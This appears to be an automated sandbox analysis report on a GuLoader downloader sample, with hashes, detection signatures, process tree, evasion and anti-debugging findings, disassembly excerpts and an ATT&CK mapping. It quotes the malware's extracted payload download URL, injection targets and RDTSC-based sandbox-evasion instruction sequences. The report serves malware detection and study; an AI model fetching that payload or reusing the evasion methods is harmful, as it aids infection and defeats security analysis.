Play interactive tour

Edit tour

Analysis Report yiu0bguw4d

Overview

General Information

Sample Name:	yiu0bguw4d (renamed file extension from none to exe)
Analysis ID:	395374
MD5:	d5b8e2ce449917bf395454082de6cba9
SHA1:	fe872c03ceef39422218003bc5a34be4faf47e55
SHA256:	981d483b809a8d146115d1a1feb7bb8d588e014a0f009deb528662d39f5657e4
Tags:	GuLoader
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

yiu0bguw4d.exe (PID: 204 cmdline: 'C:\Users\user\Desktop\yiu0bguw4d.exe' MD5: D5B8E2CE449917BF395454082DE6CBA9)

RegAsm.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\yiu0bguw4d.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1dMb_B0qeMj8gz7LWqIfB7I-0h8qhomgl", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 6304	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1dMb_B0qeMj8gz7LWqIfB7I-0h8qhomgl", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Multi AV Scanner detection for submitted file

Show sources

Source: yiu0bguw4d.exe	Virustotal: Detection: 62%	Perma Link
Source: yiu0bguw4d.exe	Metadefender: Detection: 23%	Perma Link
Source: yiu0bguw4d.exe	ReversingLabs: Detection: 79%

Source: yiu0bguw4d.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1dMb_B0qeMj8gz7LWqIfB7I-0h8qhomgl

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A08293 NtSetInformationThread,InternetReadFile,

11_2_00A08293

Source: RegAsm.exe, 0000000B.00000002.494807811.00000000007BA000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1dMb_B0qeMj8gz7L
Source: RegAsm.exe, 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1dMb_B0qeMj8gz7LWqIfB7I-0h8qhomgl

Source: yiu0bguw4d.exe, 00000000.00000002.477090048.000000000074A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\yiu0bguw4d.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A08293 NtSetInformationThread,InternetReadFile,	11_2_00A08293
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A0446B NtSetInformationThread,InternetOpenA,InternetOpenUrlA,	11_2_00A0446B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A007EC EnumWindows,NtSetInformationThread,	11_2_00A007EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A00AD7 NtSetInformationThread,	11_2_00A00AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A07CCA NtProtectVirtualMemory,	11_2_00A07CCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A081F1 NtProtectVirtualMemory,	11_2_00A081F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A008C1 NtSetInformationThread,	11_2_00A008C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A0087A NtSetInformationThread,	11_2_00A0087A

Source: C:\Users\user\Desktop\yiu0bguw4d.exe

Code function: String function: 0040172E appears 35 times

Source: yiu0bguw4d.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: yiu0bguw4d.exe, 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUruguayanernes5.exe vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe, 00000000.00000002.477199626.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUruguayanernes5.exeFE2X vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe, 00000000.00000002.477199626.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUruguayanernes5.exeFE2X. vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe, 00000000.00000002.477199626.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUruguayanernes5.exeFE2Xm vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe, 00000000.00000002.477199626.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUruguayanernes5.exeFE2X" vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe, 00000000.00000002.477037263.00000000005F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs yiu0bguw4d.exe
Source: yiu0bguw4d.exe	Binary or memory string: OriginalFilenameUruguayanernes5.exe vs yiu0bguw4d.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: yiu0bguw4d.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@3/0@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01

Source: yiu0bguw4d.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\yiu0bguw4d.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\yiu0bguw4d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: yiu0bguw4d.exe	Virustotal: Detection: 62%
Source: yiu0bguw4d.exe	Metadefender: Detection: 23%
Source: yiu0bguw4d.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\yiu0bguw4d.exe 'C:\Users\user\Desktop\yiu0bguw4d.exe'
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\yiu0bguw4d.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6304, type: MEMORY

Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040AC62 push ebp; retf	0_2_0040AC6A
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040841A push esp; retf	0_2_00408424
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040BDD1 push esp; retf	0_2_0040BDD8
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_00406DEE push es; ret	0_2_00406E09
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040C20F pushad ; retf	0_2_0040C210
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040BFD7 pushad ; ret	0_2_0040BFD8
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Code function: 0_2_0040A3EB push edx; iretd	0_2_0040A3FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A062F5 push ss; ret	11_2_00A062FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A05433 push ebx; retf	11_2_00A05434

Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A020CD	11_2_00A020CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A02141	11_2_00A02141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A01EB9	11_2_00A01EB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A01E78	11_2_00A01E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A01FFD	11_2_00A01FFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A01F55	11_2_00A01F55

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000500B36 second address: 0000000000500B36 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000504A9D second address: 0000000000504A9D instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000500D33 second address: 0000000000500D33 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 00000000005086E7 second address: 00000000005086E7 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 00000000005087CE second address: 00000000005087CE instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000502FC8 second address: 0000000000502FC8 instructions:

Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: yiu0bguw4d.exe, 00000000.00000002.477100378.0000000000761000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
Source: yiu0bguw4d.exe, 00000000.00000002.477100378.0000000000761000.00000004.00000020.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEEN
Source: RegAsm.exe, 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000507871 second address: 00000000005078A6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test eax, ecx 0x0000000d mov eax, dword ptr [esp+18h] 0x00000011 test bl, dl 0x00000013 mov byte ptr [eax], FFFFFF90h 0x00000016 test edx, eax 0x00000018 cmp ax, bx 0x0000001b mov eax, dword ptr [esp+1Ch] 0x0000001f mov byte ptr [eax], 0000006Ah 0x00000022 mov byte ptr [eax+01h], 00000000h 0x00000026 mov byte ptr [eax+02h], FFFFFFB8h 0x0000002a mov edx, dword ptr [ebp+0000013Ch] 0x00000030 nop 0x00000031 pushad 0x00000032 lfence 0x00000035 rdtsc
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000500B36 second address: 0000000000500B36 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000504A9D second address: 0000000000504A9D instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000500D33 second address: 0000000000500D33 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 00000000005086E7 second address: 00000000005086E7 instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 00000000005087CE second address: 00000000005087CE instructions:
Source: C:\Users\user\Desktop\yiu0bguw4d.exe	RDTSC instruction interceptor: First address: 0000000000502FC8 second address: 0000000000502FC8 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000A07871 second address: 0000000000A078A6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test eax, ecx 0x0000000d mov eax, dword ptr [esp+18h] 0x00000011 test bl, dl 0x00000013 mov byte ptr [eax], FFFFFF90h 0x00000016 test edx, eax 0x00000018 cmp ax, bx 0x0000001b mov eax, dword ptr [esp+1Ch] 0x0000001f mov byte ptr [eax], 0000006Ah 0x00000022 mov byte ptr [eax+01h], 00000000h 0x00000026 mov byte ptr [eax+02h], FFFFFFB8h 0x0000002a mov edx, dword ptr [ebp+0000013Ch] 0x00000030 nop 0x00000031 pushad 0x00000032 lfence 0x00000035 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A01457 rdtsc

11_2_00A01457

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6308

Thread sleep time: -1810000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: yiu0bguw4d.exe, 00000000.00000002.477100378.0000000000761000.00000004.00000020.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeen
Source: yiu0bguw4d.exe, 00000000.00000002.477100378.0000000000761000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exee
Source: RegAsm.exe, 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A08293 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000

11_2_00A08293

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A01457 rdtsc

11_2_00A01457

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A04CF1 LdrInitializeThunk,

11_2_00A04CF1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A027EC mov eax, dword ptr fs:[00000030h]	11_2_00A027EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A0672D mov eax, dword ptr fs:[00000030h]	11_2_00A0672D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A0773F mov eax, dword ptr fs:[00000030h]	11_2_00A0773F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A02889 mov eax, dword ptr fs:[00000030h]	11_2_00A02889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A03977 mov eax, dword ptr fs:[00000030h]	11_2_00A03977
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A06D85 mov eax, dword ptr fs:[00000030h]	11_2_00A06D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00A01E78 mov eax, dword ptr fs:[00000030h]	11_2_00A01E78

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: RegAsm.exe, 0000000B.00000002.495859788.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000B.00000002.495859788.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000B.00000002.495859788.0000000001220000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: RegAsm.exe, 0000000B.00000002.495859788.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: RegAsm.exe, 0000000B.00000002.495859788.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00A0087A cpuid

11_2_00A0087A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection2	Virtualization/Sandbox Evasion22	Input Capture1	Security Software Discovery721	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Application Layer Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection2	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yiu0bguw4d.exe	62%	Virustotal		Browse
yiu0bguw4d.exe	26%	Metadefender		Browse
yiu0bguw4d.exe	79%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	395374
Start date:	22.04.2021
Start time:	13:15:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	yiu0bguw4d (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@3/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 7% (good quality ratio 5.3%) Quality average: 42.1% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 70% Number of executed functions: 41 Number of non-executed functions: 20
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 131.253.33.200, 13.107.22.200, 40.88.32.150, 20.82.210.154, 92.122.145.220, 13.64.90.137, 184.30.24.56, 8.241.126.249, 8.253.145.121, 8.241.78.254, 8.241.90.126, 8.238.27.126, 20.50.102.62, 142.250.185.110, 92.122.213.247, 92.122.213.194, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:17:14	API Interceptor	181x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.766092447013738
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yiu0bguw4d.exe
File size:	159744
MD5:	d5b8e2ce449917bf395454082de6cba9
SHA1:	fe872c03ceef39422218003bc5a34be4faf47e55
SHA256:	981d483b809a8d146115d1a1feb7bb8d588e014a0f009deb528662d39f5657e4
SHA512:	54dc37f2345a4b70786920c80adf8c1fc72c9ab97edf95b239453c081ab221134fbbc8ae8d8fd3ce635d4b3aec8f42fbc44005930e917e10e1a72cbd5e442e48
SSDEEP:	3072:q9gtPOO/XUh8LKcLMD8bvl2Zo/NK9HRQBxEvOK69GqcOUVA9DrBH8YdKHar3dSGE:q9yjkz3DYYZo/Q9xQBxEvOK69GqfUVAr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W...K...W...u...W...q...W..Rich.W..........................PE..L...../L.................@...`...............P....@

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4017e8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4C2F1AF0 [Sat Jul 3 11:11:44 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	66c809d2e31d4e6411dd9b96c6b12187

Entrypoint Preview

Instruction
push 00401A08h
call 00007FC0949B6855h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], dh
pushfd
movsd
popad
pop es
hlt
loopne 00007FC0949B68AFh
mov byte ptr [edx-7CF2A144h], cl
add al, byte ptr [00000000h]
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
fcomp st(0), st(7)
sbb eax, dword ptr [ebx]
push eax
jc 00007FC0949B68D1h
push 00000065h
arpl word ptr [ecx+esi+00h], si
or byte ptr [ecx+00h], al
and byte ptr [eax], cl
inc ecx
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add eax, E18115F3h
add al, 01h
mov dword ptr [ecx-4Ah], eax
push es
xor dword ptr [ebp-1Ch], ebp
inc ecx
